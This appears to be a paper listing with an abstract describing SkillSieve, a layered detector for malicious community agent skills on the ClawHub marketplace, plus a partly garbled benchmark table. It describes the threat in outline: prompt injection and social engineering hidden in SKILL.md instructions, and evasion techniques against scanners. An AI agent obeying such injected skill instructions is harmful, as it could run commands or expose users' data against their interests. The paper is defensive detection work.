SkillSieve: A Hierarchical Triage Framework for Detecting Malicious AI Agent Skills

About

OpenClaw's ClawHub marketplace hosts tens of thousands of community-contributed agent skills (49,592 in our 2026-04-04 snapshot), and recent audits report that 13-26% contain security vulnerabilities. Regex scanners miss obfuscated payloads; formal static analyzers cannot read the natural-language SKILL.md instructions that hide prompt injection and social engineering. Neither approach covers both modalities. SkillSieve is a three-layer detection framework that applies deeper analysis only where needed. Layer 1 runs regex, AST, and metadata checks through a recall-tuned heuristic scorer, filtering 86% of the volume. Layer 2 routes suspicious skills to an LLM, splitting the analysis into four parallel sub-tasks with structured outputs. Layer 3 puts high-risk skills before a jury of three LLMs that vote independently and debate when they disagree. We evaluate on 49,592 real ClawHub skills and adversarial samples across five evasion techniques, running the pipeline on a 440 USD ARM single-board computer. On a 390-skill labeled benchmark, SkillSieve achieves F1 = 0.920 (precision 0.912, recall 0.929) at 0.006 USD per skill. An optional XGBoost fast-path cuts 32% of Layer-2/3 LLM calls with a 1.6-point F1 reduction, while preserving full-pipeline recall (0.929). For cross-ecosystem generalization, we adapt the framework to Feishu/Lark and scan 52 real packages, where Layer 2 corrects Layer 1 false positives from domain-specific idioms, suggesting a low-cost adaptation path to similar enterprise platforms. We deploy SkillSieve as a Feishu chat bot for real-time skill vetting. Code, data, and benchmark are open-sourced.

Yinghan Hou, Zongyou Yang, Zaihu Pang, Xiujun Ma• 2026

Related benchmarks

Task	Dataset	Result
Malicious Skill Detection	ClawHub Overall 1.0	Overall Balance84	9
Malicious Skill Detection	ClawHub Command Injection 1.0 (n=27)	Catch Rate85	9
Malicious Skill Detection	ClawHub Prompt Injection 1.0 (n=19)	Catch Rate79	9
Malicious Skill Detection	ClawHub	Overall Detection Rate84	9
Malicious Skill Detection	ClawHub Unsafe File Ops 1.0 (n=10)	Catch Rate80	9
Vulnerability Detection	SkillVetBench Command Injection	Malicious Verdict Count0.00e+0	9
Vulnerability Detection	SkillVetBench Prompt Injection	Malicious Verdict Count0.00e+0	9
Vulnerability Detection	SkillVetBench Unsafe File Ops	Malicious Verdict Count0.00e+0	9
Vulnerability Detection	SkillVetBench Data Exposure	Malicious Verdict Count0.00e+0	9
Vulnerability Detection	SkillVetBench Supply Chain	Malicious Verdict Count0.00e+0	9

Showing 10 of 13 rows

Other info

Follow for update

@wizwand_team Discord